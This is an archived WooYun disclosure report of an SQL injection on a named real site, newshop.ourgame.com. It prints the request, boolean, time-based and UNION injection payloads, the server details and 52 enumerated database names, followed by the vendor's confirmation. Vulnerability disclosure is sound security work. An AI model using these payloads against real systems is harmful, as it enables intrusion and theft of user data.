当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0116713

漏洞标题:联众世界某重要站点SQL注射大量数据库

相关厂商:联众世界

漏洞作者: 路人甲

提交时间:2015-05-28 15:48

修复时间:2015-07-12 16:52

公开时间:2015-07-12 16:52

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-05-28: 细节已通知厂商并且等待厂商处理中
2015-05-28: 厂商已经确认,细节仅向厂商公开
2015-06-07: 细节向核心白帽子及相关领域专家公开
2015-06-17: 细节向普通白帽子公开
2015-06-27: 细节向实习白帽子公开
2015-07-12: 细节向公众公开

简要描述:

233

详细说明:

POST /largess.aspx?productID=GBZ15041403&productName=%3F%u7ee8%3F%3F%3F&serviceID=0 HTTP/1.1
Content-Length: 524
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: newshop.ourgame.com
Cookie: *****************
Host: newshop.ourgame.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
IBN_Submit=&TBX_UserName=vogadfog&TBX_UserName2=vogadfog&__EVENTARGUMENT=&__EVENTTARGET=&__EVENTVALIDATION=/wEWBAL7kLzzBwKjprvHDwKrn7eEAQL90rkbzP8RI3Z%2bsioOZIuW7t04fbI9l8I%3d&__VIEWSTATE=/wEPDwULLTEwOTI2OTQ2MjYPZBYCAgEPZBYCAgEPFgIeBFRleHQFigEg5oKo6YCJ5oup5LqGPGIgY2xhc3M9ImY2MGIiPjxhIGhyZWY9Ii9Qcm9kdWN0L0dCWjE1MDQxNDAzLnNodG1sIiB0YXJnZXQ9Il9ibGFuayI%2b6aOO6Iqx6Zuq5pyIPC9hPjwvYj7vvIzor7fnu6fnu63ovpPlhaXkuIvpnaLnmoTkv6Hmga/vvIFkGAEFHl9fQ29udHJvbHNSZXF1aXJlUG9zdEJhY2tLZXlfXxYBBQpJQk5fU3VibWl0HqTXWehUYnC0G/Pwx3A42PXWIWk%3d

漏洞证明:

---
Parameter: productID (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: productID=GBZ15041403' AND 7892=7892 AND 'UNpY'='UNpY&productName=?%u7ee8???&serviceID=0
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase OR time-based blind (heavy query)
Payload: productID=GBZ15041403' OR 6325=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'mzKz'='mzKz&productName=?%u7ee8???&serviceID=0
Type: UNION query
Title: Generic UNION query (NULL) - 31 columns
Payload: productID=-5444' UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(122)+CHAR(98)+CHAR(122)+CHAR(113)+CHAR(97)+CHAR(106)+CHAR(121)+CHAR(113)+CHAR(98)+CHAR(107)+CHAR(81)+CHAR(69)+CHAR(116)+CHAR(97)+CHAR(113)+CHAR(106)+CHAR(98)+CHAR(113)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &productName=?%u7ee8???&serviceID=0
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
available databases [52]:
[*] B2CPayment
[*] DBA
[*] DBADMIN
[*] DCacheConfigDB
[*] DzTranslation
[*] GL_DB
[*] GL_DB1
[*] GLAdmin
[*] GLB2B
[*] GLB2C
[*] GLBill
[*] GLBuy
[*] GLCOMM_Subject
[*] GLHomeApp
[*] GLImage
[*] GLJHBBS
[*] GLJHInnerBBS
[*] GLJHWEB
[*] GLLUCK
[*] GLLuckPlayer
[*] GLLuckValue
[*] GLNews
[*] GLOGWebCommon
[*] GLOGWEBSERVICE
[*] GLPowerCoin
[*] GLSubject
[*] GLTXBBS
[*] GLWOGBBS
[*] GLZuobi
[*] LZMain
[*] LZSubject
[*] LZWebapp
[*] lzwpt
[*] master
[*] MatchDB
[*] MatchDB1
[*] MatchDB2
[*] MatchDB3
[*] MatchDB_YDLY5
[*] MHBBS
[*] model
[*] msdb
[*] newjunqi
[*] OGMain
[*] OGManage
[*] OGSubject
[*] QLGBBS
[*] tempdb
[*] test_jhbbs
[*] TWLZMain
[*] TWLZMall
[*] WebChargeCenter

修复方案:

~~

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:16

确认时间:2015-05-28 16:51

厂商回复:

感谢对联众的关注。问题处理中。

最新状态:

暂无